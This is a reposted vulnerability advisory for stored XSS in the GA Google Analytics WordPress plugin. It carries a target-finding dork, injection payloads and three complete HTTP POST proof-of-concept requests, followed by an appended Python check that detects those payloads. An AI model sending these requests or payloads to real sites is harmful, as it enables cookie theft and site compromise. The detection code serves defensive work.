GA Google Analytics WordPress Plugin <= 20210211 - Multiple Authenticated Persistent XSS
CVE: CVE-2021-24181
Category: CWE-79
Price: $5,000
Severity: High
Author: Cybersecurity Researcher
Risk: High
Exploitation Type: Remote
Date: 2021-05-17
CPE: cpe:cpe:/a:google_analytics:google_analytics_wordpress_plugin
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050090 Below is a copy:
GA Google Analytics WordPress Plugin <= 20210211 - Multiple Authenticated Persistent XSS
/*!
- # VULNERABILITY: GA Google Analytics WordPress Plugin <= 20210211 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/ga-google-analytics/
- # DATE: 2021-04-04
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Jeff Starr [ https://plugin-planet.com ]
- # SOFTWARE VERSION: <= 20210211
- # SOFTWARE LINK: https://wordpress.org/plugins/ga-google-analytics/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: N/A
*/
### -- [ Info: ]
[i] An Authenticated Persistent XSS vulnerability was discovered in the GA Google Analytics plugin through v20210211 for WordPress.
[i] Vulnerable parameter(s): &gap_options[gap_id]=, &gap_options[tracker_object]=, &gap_options[gap_custom_code]=.
### -- [ Impact: ]
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Payloads: ]
[$] GA Tracking ID: 13"' ' m0ze=m0ze= onload=alert(document.cookie); //
[$] Custom Tracker Objects: '');alert(document.cookie);alert('m0ze'
[$] Custom Tracker Objects (Part #1): '\');alert(document.cookie);/* | Custom GA Code (Part #2): */;
### -- [ PoC #1 | Authenticated Persistent XSS | GA Tracking ID: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 459
Cookie: [admin cookies]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&gap_options%5Bgap_id%5D=13%22%27+%27+m0ze%3Dm0ze%3D+onload%3Dalert%28document.cookie%29%3B+%2F%2F&gap_options%5Bgap_enable%5D=2&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=
### -- [ PoC #2 | Authenticated Persistent XSS | Custom Tracker Objects: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
Cookie: [admin cookie]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%27%29%3Balert%28document.cookie%29%3Balert%28%27m0ze%27&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=
### -- [ PoC #3 | Authenticated Persistent XSS | Custom Tracker Objects & Custom GA Code: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 445
Cookie: [admin cookie]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%5C%27%29%3Balert%28document.cookie%29%3B%2F*&gap_options%5Bgap_custom_code%5D=*%2F%3B&gap_options%5Bgap_custom%5D=
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
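A detection-side check for the three parameters named in the advisory, as an added example that is not part of the original advisory or the plugin's own code: it parses a form body posted to /wp-admin/options.php and flags values that do not look like legitimate settings. The tracking-ID and tracker-object patterns are assumptions about what legitimate values look like, and the names check_fields, BENIGN and POC3 are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumption: legitimate tracking IDs are Universal Analytics or GA4 style.
TRACKING_ID = re.compile(r"UA-\d{4,10}-\d{1,4}|G-[A-Z0-9]{4,20}")
# Assumption: a legitimate tracker object is a flat JS object literal.
TRACKER_OBJECT = re.compile(r"[\w\s{}\[\]'\":,.\-]*")
PREFIX = "gap_options[%s]"


def check_fields(body):
    """Return findings for one urlencoded body posted to /wp-admin/options.php."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("option_page") != ["gap_plugin_options"]:
        return []  # not this plugin's settings form
    gap_id = form.get(PREFIX % "gap_id", [""])[0]
    tracker = form.get(PREFIX % "tracker_object", [""])[0]
    custom = form.get(PREFIX % "gap_custom_code", [""])[0]
    findings = []
    if gap_id and not TRACKING_ID.fullmatch(gap_id):
        findings.append("gap_id: not a tracking ID")
    if not TRACKER_OBJECT.fullmatch(tracker):
        findings.append("tracker_object: characters outside an object literal")
    # The custom-code field legitimately holds JavaScript, so only look for
    # tokens that change how the surrounding page is parsed: a comment opened
    # in one field and closed in another, or an early </script>.
    for name, value in (("tracker_object", tracker), ("gap_custom_code", custom)):
        rest = re.sub(r"/\*.*?\*/", "", value, flags=re.S)
        if "/*" in rest or "*/" in rest or "</script" in rest.lower():
            findings.append(name + ": unbalanced comment or script terminator")
    return findings


# Constructed benign settings update.
BENIGN = urlencode({
    "option_page": "gap_plugin_options",
    PREFIX % "gap_id": "UA-12345678-1",
    PREFIX % "tracker_object": "{'cookieDomain':'none'}",
    PREFIX % "gap_custom_code": "ga('set', 'anonymizeIp', true); /* note */",
})
# Fields taken from the body of PoC #3 above.
POC3 = ("option_page=gap_plugin_options&gap_options%5Bgap_id%5D=m0ze"
        "&gap_options%5Btracker_object%5D=%27%5C%27%29%3Balert%28document.cookie%29%3B%2F*"
        "&gap_options%5Bgap_custom_code%5D=*%2F%3B")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("PoC #3", POC3)):
        print(label, check_fields(body))
```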